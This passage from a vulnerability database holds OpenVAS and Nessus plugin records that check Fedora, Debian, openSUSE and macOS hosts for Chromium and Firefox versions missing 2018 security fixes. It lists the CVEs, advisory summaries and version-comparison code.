"modified": "2019-03-15T00:00:00", "published": "2018-06-21T00:00:00", "id": "OPENVAS:1361412562310874714", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874714", "title": "Fedora Update for chromium FEDORA-2018-09b59b0227", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_09b59b0227_chromium_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for chromium FEDORA-2018-09b59b0227\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874714\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-21 06:19:31 +0200 (Thu, 21 Jun 2018)\");\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\", \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\", \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\", \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6148\", \"CVE-2018-6147\", \"CVE-2018-6145\", \"CVE-2018-6144\", \"CVE-2018-6143\", \"CVE-2018-6142\", \"CVE-2018-6141\", \"CVE-2018-6140\", \"CVE-2018-6139\", \"CVE-2018-6138\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for chromium FEDORA-2018-09b59b0227\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"chromium on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-09b59b0227\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4FIVPSE5MN6YAGKYNI4VQQ5QIKJ4ZMYZ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~67.0.3396.79~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-04T18:55:57", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2018-6118\nNed Williamson discovered a use-after-free issue.\n\nCVE-2018-6120\nZhou Aiting discovered a buffer overflow issue in the pdfium library.\n\nCVE-2018-6121\nIt was discovered that malicious extensions could escalate privileges.\n\nCVE-2018-6122\nA type confusion issue was discovered in the v8 javascript library.\n\nCVE-2018-6123\nLooben Yang discovered a use-after-free issue.\n\nCVE-2018-6124\nGuang Gong discovered a type confusion issue.\n\nCVE-2018-6125\nYubico discovered that the WebUSB implementation was too permissive.\n\nCVE-2018-6126\nIvan Fratric discovered a buffer overflow issue in the skia library.\n\nCVE-2018-6127\nLooben Yang discovered a use-after-free issue.\n\nCVE-2018-6129\nNatalie Silvanovich discovered an out-of-bounds read issue in WebRTC.\n\nCVE-2018-6130\nNatalie Silvanovich discovered an out-of-bounds read issue in WebRTC.\n\nCVE-2018-6131\nNatalie Silvanovich discovered an error in WebAssembly.\n\nCVE-2018-6132\nRonald E. Crane discovered an uninitialized memory issue.\n\nCVE-2018-6133\nKhalil Zhani discovered a URL spoofing issue.\n\nCVE-2018-6134\nJun Kokatsu discovered a way to bypass the Referrer Policy.\n\nCVE-2018-6135\nJasper Rebane discovered a user interface spoofing issue.\n\nCVE-2018-6136\nPeter Wong discovered an out-of-bounds read issue in the v8 javascript\nlibrary.\n\nCVE-2018-6137\nMichael Smith discovered an information leak.\n\nCVE-2018-6138\nFran\u00e7ois Lajeunesse-Robert discovered that the extensions policy was\ntoo permissive.\n\nCVE-2018-6139\nRob Wu discovered a way to bypass restrictions in the debugger extension.\n\nCVE-2018-6140\nRob Wu discovered a way to bypass restrictions in the debugger extension.\n\nCVE-2018-6141\nYangkang discovered a buffer overflow issue in the skia library.\n\nCVE-2018-6142\nChoongwoo Han discovered an out-of-bounds read in the v8 javascript\nlibrary.\n\nCVE-2018-6143\nGuang Gong discovered an out-of-bounds read in the v8 javascript library.\n\nCVE-2018-6144\npdknsk discovered an out-of-bounds read in the pdfium library.\n\nCVE-2018-6145\nMasato Kinugawa discovered an error in the MathML implementation.\n\nCVE-2018-6147\nMichail Pishchagin discovered an error in password entry fields.\n\nCVE-2018-6148\nMicha? Bentkowski discovered that the Content Security Policy header\nwas handled incorrectly.\n\nCVE-2018-6149\nYu Zhou and Jundong Xie discovered an out-of-bounds write issue in the\nv8 javascript library.", "modified": "2019-07-04T00:00:00", "published": "2018-06-30T00:00:00", "id": "OPENVAS:1361412562310704237", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704237", "title": "Debian Security Advisory DSA 4237-1 (chromium-browser - security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4237-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704237\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-6118\", \"CVE-2018-6120\", \"CVE-2018-6121\", \"CVE-2018-6122\", \"CVE-2018-6123\",\n \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\", \"CVE-2018-6127\", \"CVE-2018-6129\",\n \"CVE-2018-6130\", \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\",\n \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\", \"CVE-2018-6139\",\n \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\", \"CVE-2018-6143\", \"CVE-2018-6144\",\n \"CVE-2018-6145\", \"CVE-2018-6147\", \"CVE-2018-6148\", \"CVE-2018-6149\");\n script_name(\"Debian Security Advisory DSA 4237-1 (chromium-browser - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-30 00:00:00 +0200 (Sat, 30 Jun 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4237.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"chromium-browser on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 67.0.3396.87-1~deb9u1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/chromium-browser\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2018-6118\nNed Williamson discovered a use-after-free issue.\n\nCVE-2018-6120\nZhou Aiting discovered a buffer overflow issue in the pdfium library.\n\nCVE-2018-6121\nIt was discovered that malicious extensions could escalate privileges.\n\nCVE-2018-6122\nA type confusion issue was discovered in the v8 javascript library.\n\nCVE-2018-6123\nLooben Yang discovered a use-after-free issue.\n\nCVE-2018-6124\nGuang Gong discovered a type confusion issue.\n\nCVE-2018-6125\nYubico discovered that the WebUSB implementation was too permissive.\n\nCVE-2018-6126\nIvan Fratric discovered a buffer overflow issue in the skia library.\n\nCVE-2018-6127\nLooben Yang discovered a use-after-free issue.\n\nCVE-2018-6129\nNatalie Silvanovich discovered an out-of-bounds read issue in WebRTC.\n\nCVE-2018-6130\nNatalie Silvanovich discovered an out-of-bounds read issue in WebRTC.\n\nCVE-2018-6131\nNatalie Silvanovich discovered an error in WebAssembly.\n\nCVE-2018-6132\nRonald E. Crane discovered an uninitialized memory issue.\n\nCVE-2018-6133\nKhalil Zhani discovered a URL spoofing issue.\n\nCVE-2018-6134\nJun Kokatsu discovered a way to bypass the Referrer Policy.\n\nCVE-2018-6135\nJasper Rebane discovered a user interface spoofing issue.\n\nCVE-2018-6136\nPeter Wong discovered an out-of-bounds read issue in the v8 javascript\nlibrary.\n\nCVE-2018-6137\nMichael Smith discovered an information leak.\n\nCVE-2018-6138\nFran\u00e7ois Lajeunesse-Robert discovered that the extensions policy was\ntoo permissive.\n\nCVE-2018-6139\nRob Wu discovered a way to bypass restrictions in the debugger extension.\n\nCVE-2018-6140\nRob Wu discovered a way to bypass restrictions in the debugger extension.\n\nCVE-2018-6141\nYangkang discovered a buffer overflow issue in the skia library.\n\nCVE-2018-6142\nChoongwoo Han discovered an out-of-bounds read in the v8 javascript\nlibrary.\n\nCVE-2018-6143\nGuang Gong discovered an out-of-bounds read in the v8 javascript library.\n\nCVE-2018-6144\npdknsk discovered an out-of-bounds read in the pdfium library.\n\nCVE-2018-6145\nMasato Kinugawa discovered an error in the MathML implementation.\n\nCVE-2018-6147\nMichail Pishchagin discovered an error in password entry fields.\n\nCVE-2018-6148\nMicha? Bentkowski discovered that the Content Security Policy header\nwas handled incorrectly.\n\nCVE-2018-6149\nYu Zhou and Jundong Xie discovered an out-of-bounds write issue in the\nv8 javascript library.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"chromedriver\", ver:\"67.0.3396.87-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium\", ver:\"67.0.3396.87-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-driver\", ver:\"67.0.3396.87-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"67.0.3396.87-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-shell\", ver:\"67.0.3396.87-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-widevine\", ver:\"67.0.3396.87-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:13:23", "bulletinFamily": "scanner", "description": "This host is installed with\n Mozilla Firefox ESR and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-06-07T00:00:00", "id": "OPENVAS:1361412562310813395", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813395", "title": "Mozilla Firefox ESR Security Updates(mfsa_2018-14_2018-14)-MAC OS X", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox ESR Security Updates(mfsa_2018-14_2018-14)-MAC OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox_esr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813395\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2018-6126\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-07 10:54:24 +0530 (Thu, 07 Jun 2018)\");\n script_name(\"Mozilla Firefox ESR Security Updates(mfsa_2018-14_2018-14)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with\n Mozilla Firefox ESR and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Flaw exists due to a heap buffer\n overflow can occur in the Skia library when rasterizing paths using a\n maliciously crafted SVG file with anti-aliasing turned off.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to result in a potentially\n exploitable crash.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox ESR version before\n 52.8.1 and 60.x before 60.0.2 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox ESR version 52.8.1\n or 60.0.2 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2018-14/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox-ESR/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nffVer = infos['version'];\nffPath = infos['location'];\n\nif(version_is_less(version:ffVer, test_version:\"52.8.1\")){\n fix = \"52.8.1\";\n}\n\nelse if(ffVer =~ \"^(60\\.0)\" && version_is_less(version:ffVer, test_version:\"60.0.2\")){\n fix = \"60.0.2\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:fix, install_path:ffPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:13:33", "bulletinFamily": "scanner", "description": "This host is installed with\n Mozilla Firefox and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-06-07T00:00:00", "id": "OPENVAS:1361412562310813393", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813393", "title": "Mozilla Firefox Security Updates( mfsa_2018-14_2018-14 )-MAC OS X", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Security Updates( mfsa_2018-14_2018-14 )-MAC OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813393\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2018-6126\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-07 10:53:51 +0530 (Thu, 07 Jun 2018)\");\n script_name(\"Mozilla Firefox Security Updates( mfsa_2018-14_2018-14 )-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with\n Mozilla Firefox and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Flaw exists due to a heap buffer\n overflow can occur in the Skia library when rasterizing paths using a\n maliciously crafted SVG file with anti-aliasing turned off.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to result in a potentially\n exploitable crash.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox version before\n 60.0.2 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 60.0.2\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2018-14/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nffVer = infos['version'];\nffPath = infos['location'];\n\nif(version_is_less(version:ffVer, test_version:\"60.0.2\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"60.0.2\", install_path:ffPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-02-21T01:41:20", "bulletinFamily": "scanner", "description": "This update for Chromium to version 67.0.3396.99 fixes multiple issues.\n\nSecurity issues fixed (bsc#1095163) :\n\n - CVE-2018-6123: Use after free in Blink\n\n - CVE-2018-6124: Type confusion in Blink\n\n - CVE-2018-6125: Overly permissive policy in WebUSB\n\n - CVE-2018-6126: Heap buffer overflow in Skia\n\n - CVE-2018-6127: Use after free in indexedDB\n\n - CVE-2018-6129: Out of bounds memory access in WebRTC\n\n - CVE-2018-6130: Out of bounds memory access in WebRTC\n\n - CVE-2018-6131: Incorrect mutability protection in WebAssembly\n\n - CVE-2018-6132: Use of uninitialized memory in WebRTC\n\n - CVE-2018-6133: URL spoof in Omnibox\n\n - CVE-2018-6134: Referrer Policy bypass in Blink\n\n - CVE-2018-6135: UI spoofing in Blink\n\n - CVE-2018-6136: Out of bounds memory access in V8\n\n - CVE-2018-6137: Leak of visited status of page in Blink\n\n - CVE-2018-6138: Overly permissive policy in Extensions\n\n - CVE-2018-6139: Restrictions bypass in the debugger extension API\n\n - CVE-2018-6140: Restrictions bypass in the debugger extension API\n\n - CVE-2018-6141: Heap buffer overflow in Skia\n\n - CVE-2018-6142: Out of bounds memory access in V8\n\n - CVE-2018-6143: Out of bounds memory access in V8\n\n - CVE-2018-6144: Out of bounds memory access in PDFium\n\n - CVE-2018-6145: Incorrect escaping of MathML in Blink\n\n - CVE-2018-6147: Password fields not taking advantage of OS protections in Views\n\n - CVE-2018-6148: Incorrect handling of CSP header (boo#1096508)\n\n - CVE-2018-6149: Out of bounds write in V8 (boo#1097452)\n\nThe following tracked packaging changes are included :\n\n - Require ffmpeg >= 4.0 (boo#1095545)", "modified": "2019-01-31T00:00:00", "id": "OPENSUSE-2018-759.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111345", "published": "2018-07-26T00:00:00", "title": "openSUSE Security Update : Chromium (openSUSE-2018-759)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-759.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111345);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/01/31 9:35:42\");\n\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\", \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\", \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\", \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\", \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\", \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\", \"CVE-2018-6148\", \"CVE-2018-6149\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2018-759)\");\n script_summary(english:\"Check for the openSUSE-2018-759 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for Chromium to version 67.0.3396.99 fixes multiple\nissues.\n\nSecurity issues fixed (bsc#1095163) :\n\n - CVE-2018-6123: Use after free in Blink\n\n - CVE-2018-6124: Type confusion in Blink\n\n - CVE-2018-6125: Overly permissive policy in WebUSB\n\n - CVE-2018-6126: Heap buffer overflow in Skia\n\n - CVE-2018-6127: Use after free in indexedDB\n\n - CVE-2018-6129: Out of bounds memory access in WebRTC\n\n - CVE-2018-6130: Out of bounds memory access in WebRTC\n\n - CVE-2018-6131: Incorrect mutability protection in\n WebAssembly\n\n - CVE-2018-6132: Use of uninitialized memory in WebRTC\n\n - CVE-2018-6133: URL spoof in Omnibox\n\n - CVE-2018-6134: Referrer Policy bypass in Blink\n\n - CVE-2018-6135: UI spoofing in Blink\n\n - CVE-2018-6136: Out of bounds memory access in V8\n\n - CVE-2018-6137: Leak of visited status of page in Blink\n\n - CVE-2018-6138: Overly permissive policy in Extensions\n\n - CVE-2018-6139: Restrictions bypass in the debugger\n extension API\n\n - CVE-2018-6140: Restrictions bypass in the debugger\n extension API\n\n - CVE-2018-6141: Heap buffer overflow in Skia\n\n - CVE-2018-6142: Out of bounds memory access in V8\n\n - CVE-2018-6143: Out of bounds memory access in V8\n\n - CVE-2018-6144: Out of bounds memory access in PDFium\n\n - CVE-2018-6145: Incorrect escaping of MathML in Blink\n\n - CVE-2018-6147: Password fields not taking advantage of\n OS protections in Views\n\n - CVE-2018-6148: Incorrect handling of CSP header\n (boo#1096508)\n\n - CVE-2018-6149: Out of bounds write in V8 (boo#1097452)\n\nThe following tracked packaging changes are included :\n\n - Require ffmpeg >= 4.0 (boo#1095545)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1070421\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1093031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1096508\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097452\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-67.0.3396.99-lp150.2.3.3\") ) flag++;\nif 